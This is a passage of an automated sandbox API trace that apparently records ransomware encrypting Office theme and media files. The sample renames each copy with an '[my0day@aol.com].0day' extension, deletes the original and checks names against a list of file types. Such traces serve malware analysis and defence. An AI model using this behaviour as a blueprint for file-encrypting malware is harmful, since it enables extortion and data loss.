dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0274.071] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.071] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.071] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\slipstream.eftx.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0274.074] GetLastError () returned 0x0 [0274.074] ReadFile (in: hFile=0x384, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x6c8d, lpOverlapped=0x0) returned 1 [0274.088] WriteFile (in: hFile=0x2c4, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x6c90, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0x6c90, lpOverlapped=0x0) returned 1 [0274.089] ReadFile (in: hFile=0x384, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.089] WriteFile (in: hFile=0x2c4, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0xf2, lpOverlapped=0x0) returned 1 [0274.089] SetEndOfFile (hFile=0x2c4) returned 1 [0274.089] CloseHandle (hObject=0x2c4) returned 1 [0274.089] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.089] SetEndOfFile (hFile=0x384) returned 1 [0274.093] CloseHandle (hObject=0x384) returned 1 [0274.093] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.093] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\slipstream.eftx")) returned 1 [0274.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx") returned 82 [0274.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx") returned 82 [0274.093] lstrlenW (lpString=".doc") returned 4 [0274.093] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0274.093] lstrlenW (lpString=".docx") returned 5 [0274.093] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0274.093] lstrlenW (lpString=".pdf") returned 4 [0274.093] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0274.093] lstrlenW (lpString=".xls") returned 4 [0274.093] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0274.093] lstrlenW (lpString=".xlsx") returned 5 [0274.093] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0274.093] lstrlenW (lpString=".ppt") returned 4 [0274.094] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0274.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx") returned 82 [0274.094] lstrlenW (lpString=".zip") returned 4 [0274.094] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0274.094] lstrlenW (lpString=".rar") returned 4 [0274.094] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0274.094] lstrlenW (lpString=".bz2") returned 4 [0274.094] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0274.094] lstrlenW (lpString=".7z") returned 3 [0274.094] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0274.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx") returned 82 [0274.094] lstrlenW (lpString=".dbf") returned 4 [0274.094] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0274.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx") returned 82 [0274.094] lstrlenW (lpString=".1cd") returned 4 [0274.094] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0274.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx") returned 82 [0274.094] lstrlenW (lpString=".jpg") returned 4 [0274.094] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0274.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx") returned 82 [0274.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx") returned 82 [0274.094] lstrlenW (lpString=".doc") returned 4 [0274.094] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0274.094] lstrlenW (lpString=".docx") returned 5 [0274.094] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0274.094] lstrlenW (lpString=".pdf") returned 4 [0274.094] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0274.094] lstrlenW (lpString=".xls") returned 4 [0274.094] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0274.094] lstrlenW (lpString=".xlsx") returned 5 [0274.094] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0274.094] lstrlenW (lpString=".ppt") returned 4 [0274.094] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0274.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx") returned 82 [0274.094] lstrlenW (lpString=".zip") returned 4 [0274.094] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0274.094] lstrlenW (lpString=".rar") returned 4 [0274.095] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0274.095] lstrlenW (lpString=".bz2") returned 4 [0274.095] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0274.095] lstrlenW (lpString=".7z") returned 3 [0274.095] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0274.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx") returned 82 [0274.095] lstrlenW (lpString=".dbf") returned 4 [0274.095] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0274.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx") returned 82 [0274.095] lstrlenW (lpString=".1cd") returned 4 [0274.095] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0274.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx") returned 82 [0274.095] lstrlenW (lpString=".jpg") returned 4 [0274.095] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0274.095] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0274.095] lstrlenW (lpString="Urban.eftx") returned 10 [0274.095] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\urban.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0274.102] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x344ff1c | out: lpFileSize=0x344ff1c*=19611) returned 1 [0274.102] CloseHandle (hObject=0x37c) returned 1 [0274.102] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\urban.eftx")) returned 0x20 [0274.103] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\urban.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.103] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\urban.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0274.103] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.103] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.103] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\urban.eftx.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0274.106] GetLastError () returned 0x0 [0274.106] ReadFile (in: hFile=0x37c, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x4c9b, lpOverlapped=0x0) returned 1 [0274.108] WriteFile (in: hFile=0x2cc, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x4ca0, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0x4ca0, lpOverlapped=0x0) returned 1 [0274.109] ReadFile (in: hFile=0x37c, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.109] WriteFile (in: hFile=0x2cc, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0274.110] SetEndOfFile (hFile=0x2cc) returned 1 [0274.110] CloseHandle (hObject=0x2cc) returned 1 [0274.110] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.110] SetEndOfFile (hFile=0x37c) returned 1 [0274.112] CloseHandle (hObject=0x37c) returned 1 [0274.113] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.113] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\urban.eftx")) returned 1 [0274.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx") returned 77 [0274.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx") returned 77 [0274.113] lstrlenW (lpString=".doc") returned 4 [0274.113] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0274.113] lstrlenW (lpString=".docx") returned 5 [0274.113] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0274.113] lstrlenW (lpString=".pdf") returned 4 [0274.113] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0274.113] lstrlenW (lpString=".xls") returned 4 [0274.113] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0274.113] lstrlenW (lpString=".xlsx") returned 5 [0274.113] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0274.113] lstrlenW (lpString=".ppt") returned 4 [0274.113] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0274.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx") returned 77 [0274.113] lstrlenW (lpString=".zip") returned 4 [0274.113] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0274.113] lstrlenW (lpString=".rar") returned 4 [0274.113] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0274.113] lstrlenW (lpString=".bz2") returned 4 [0274.113] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0274.113] lstrlenW (lpString=".7z") returned 3 [0274.113] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0274.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx") returned 77 [0274.113] lstrlenW (lpString=".dbf") returned 4 [0274.113] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0274.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx") returned 77 [0274.114] lstrlenW (lpString=".1cd") returned 4 [0274.114] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0274.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx") returned 77 [0274.114] lstrlenW (lpString=".jpg") returned 4 [0274.114] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0274.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx") returned 77 [0274.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx") returned 77 [0274.114] lstrlenW (lpString=".doc") returned 4 [0274.114] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0274.114] lstrlenW (lpString=".docx") returned 5 [0274.114] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0274.114] lstrlenW (lpString=".pdf") returned 4 [0274.114] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0274.114] lstrlenW (lpString=".xls") returned 4 [0274.114] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0274.114] lstrlenW (lpString=".xlsx") returned 5 [0274.114] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0274.114] lstrlenW (lpString=".ppt") returned 4 [0274.114] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0274.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx") returned 77 [0274.114] lstrlenW (lpString=".zip") returned 4 [0274.114] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0274.114] lstrlenW (lpString=".rar") returned 4 [0274.114] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0274.114] lstrlenW (lpString=".bz2") returned 4 [0274.114] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0274.114] lstrlenW (lpString=".7z") returned 3 [0274.114] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0274.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx") returned 77 [0274.114] lstrlenW (lpString=".dbf") returned 4 [0274.114] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0274.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx") returned 77 [0274.114] lstrlenW (lpString=".1cd") returned 4 [0274.114] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0274.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx") returned 77 [0274.114] lstrlenW (lpString=".jpg") returned 4 [0274.114] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0274.115] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0274.115] lstrlenW (lpString="Verve.eftx") returned 10 [0274.115] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\verve.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0274.116] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x344ff1c | out: lpFileSize=0x344ff1c*=31224) returned 1 [0274.116] CloseHandle (hObject=0x37c) returned 1 [0274.116] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\verve.eftx")) returned 0x20 [0274.116] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\verve.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.116] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\verve.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0274.116] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.116] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.116] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\verve.eftx.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0274.116] GetLastError () returned 0x0 [0274.117] ReadFile (in: hFile=0x37c, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x79f8, lpOverlapped=0x0) returned 1 [0274.119] WriteFile (in: hFile=0x2cc, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x7a00, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0x7a00, lpOverlapped=0x0) returned 1 [0274.120] ReadFile (in: hFile=0x37c, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.120] WriteFile (in: hFile=0x2cc, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0274.120] SetEndOfFile (hFile=0x2cc) returned 1 [0274.120] CloseHandle (hObject=0x2cc) returned 1 [0274.120] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.120] SetEndOfFile (hFile=0x37c) returned 1 [0274.158] CloseHandle (hObject=0x37c) returned 1 [0274.158] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.244] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\verve.eftx")) returned 1 [0274.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx") returned 77 [0274.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx") returned 77 [0274.245] lstrlenW (lpString=".doc") returned 4 [0274.245] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0274.245] lstrlenW (lpString=".docx") returned 5 [0274.245] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0274.245] lstrlenW (lpString=".pdf") returned 4 [0274.245] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0274.245] lstrlenW (lpString=".xls") returned 4 [0274.245] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0274.245] lstrlenW (lpString=".xlsx") returned 5 [0274.245] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0274.245] lstrlenW (lpString=".ppt") returned 4 [0274.245] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0274.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx") returned 77 [0274.245] lstrlenW (lpString=".zip") returned 4 [0274.245] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0274.245] lstrlenW (lpString=".rar") returned 4 [0274.245] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0274.245] lstrlenW (lpString=".bz2") returned 4 [0274.245] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0274.245] lstrlenW (lpString=".7z") returned 3 [0274.245] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0274.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx") returned 77 [0274.245] lstrlenW (lpString=".dbf") returned 4 [0274.245] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0274.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx") returned 77 [0274.246] lstrlenW (lpString=".1cd") returned 4 [0274.246] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0274.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx") returned 77 [0274.246] lstrlenW (lpString=".jpg") returned 4 [0274.246] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0274.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx") returned 77 [0274.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx") returned 77 [0274.246] lstrlenW (lpString=".doc") returned 4 [0274.246] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0274.246] lstrlenW (lpString=".docx") returned 5 [0274.246] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0274.246] lstrlenW (lpString=".pdf") returned 4 [0274.246] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0274.246] lstrlenW (lpString=".xls") returned 4 [0274.246] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0274.246] lstrlenW (lpString=".xlsx") returned 5 [0274.246] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0274.246] lstrlenW (lpString=".ppt") returned 4 [0274.246] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0274.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx") returned 77 [0274.246] lstrlenW (lpString=".zip") returned 4 [0274.246] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0274.246] lstrlenW (lpString=".rar") returned 4 [0274.246] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0274.246] lstrlenW (lpString=".bz2") returned 4 [0274.246] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0274.246] lstrlenW (lpString=".7z") returned 3 [0274.246] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0274.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx") returned 77 [0274.246] lstrlenW (lpString=".dbf") returned 4 [0274.246] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0274.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx") returned 77 [0274.246] lstrlenW (lpString=".1cd") returned 4 [0274.246] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0274.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx") returned 77 [0274.246] lstrlenW (lpString=".jpg") returned 4 [0274.246] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0274.247] lstrcmpiW (lpString1=".MML", lpString2=".0day") returned 1 [0274.247] lstrlenW (lpString="OFFICE10.MML") returned 12 [0274.247] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML" (normalized: "c:\\program files\\microsoft office\\media\\office14\\1033\\office10.mml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0274.247] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x344ff1c | out: lpFileSize=0x344ff1c*=312376) returned 1 [0274.247] CloseHandle (hObject=0x394) returned 1 [0274.248] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML" (normalized: "c:\\program files\\microsoft office\\media\\office14\\1033\\office10.mml")) returned 0x20 [0274.248] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\media\\office14\\1033\\office10.mml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.248] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML" (normalized: "c:\\program files\\microsoft office\\media\\office14\\1033\\office10.mml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0274.248] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.248] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.248] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\media\\office14\\1033\\office10.mml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0274.844] GetLastError () returned 0x0 [0274.844] ReadFile (in: hFile=0x394, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, 